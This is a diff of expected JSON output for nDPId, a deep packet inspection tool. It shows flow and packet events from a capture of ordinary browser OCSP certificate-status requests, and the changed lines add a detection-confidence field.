+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222699655,"flow_last_seen":1623222699655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623222699655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623222699655,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N6FAAEAG+ZTAqAGAjvq4Y9OKAFA7VkTpAAAAAKAC+vDDlAAAAgQFtAQCCAqSLZmsAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx0lW5"}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623222699659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623222699659,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8l3UAADkG4ECO+rhjwKgBgABQ04qgD55GO1ZE6qAS\/\/9O2gAAAgQFlgQCCAovwgGfki2ZrAEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACT46ug"}
 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623222699662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623222699662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0N6JAAEAG+ZvAqAGAjvq4Y9OKAFA7VkTqoA+eR4AQAfZ7iwAAAQEICpItmbQvwgGfGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAZWVw=="}
-00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222785863,"flow_last_seen":1623222785863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623222785863,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222785863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623222785863,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8JGFAAEAGl83AqAGAXHpf66rQAFDHRQtaAAAAAKAC+vAjygAAAgQFtAQCCAq0VnigAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2OTsI"}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222785875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623222785875,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGxC5cel\/rwKgBgABQqtACFmIrx0ULW6AScSDxGwAAAgQFtAQCCAqrs6x4tFZ4oAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8kYB7"}
 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222785879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623222785879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0JGJAAEAGl9TAqAGAXHpf66rQAFDHRQtbAhZiLIAQAfaPAgAAAQEICrRWeLCrs6x4GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcxJlyw=="}
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
-00646{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}}
+00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223090984,"flow_last_seen":1623223090984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223090984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623223090984,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8WOFAAEAGCBnAqAGAl4uADoYQAFC9BO7MAAAAAKAC+vBq5AAAAgQFtAQCCArLCQstAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk1G4o"}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223091009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623223091009,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADAGcPqXi4AOwKgBgABQhhCFN\/R2vQTuzaAS\/ohuswAAAgQFtAQCCAoBgn1XywkLLQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKwfqN"}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223091014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623223091014,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0WOJAAEAGCCDAqAGAl4uADoYQAFC9BO7NhTf0d4AQAfaZ9AAAAQEICssJC0sBgn1XGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwg24A=="}
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223091709,"flow_last_seen":1623223091709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623223091709,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623223091709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623223091709,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8XL5AAEAGBDzAqAGAl4uADoYkAFDUes8oAAAAAKAC+vBwKQAAAgQFtAQCCArLCQ4CAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACb3tkC"}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623223091736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623223091736,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAC8GcfqXi4AOwKgBgABQhiREDjpk1HrPKaAS\/\/+ohwAAAgQFtAQCCAp7mshzywkOAgEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvlhtb"}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623223091739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623223091739,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0XL9AAEAGBEPAqAGAl4uADoYkAFDUes8pRA46ZYAQAfbVQAAAAQEICssJDiB7mshzGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApa33FQ=="}
-00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
-00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
-00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
+00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
+00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226796047,"flow_last_seen":1623226796047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1623226796047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623226796047,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8IiFAAEAGHJ3AqAGAXbjcHbsgAFDKwHZTAAAAAKAC+vANzwAAAgQFtAQCCArJnn0eAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC2uJMq"}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1623226796050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623226796050,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8OIIAADgGTjxduNwdwKgBgABQuyB0cdYZysB2VKAS\/\/931wAAAgQFtAQCCAqXTK79yZ59HgEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApvHVR"}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1623226796054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623226796054,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0IiJAAEAGHKTAqAGAXbjcHbsgAFDKwHZUdHHWGoAQAfakpwAAAQEICsmefSaXTK79GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5srZww=="}
-00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
-00646{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
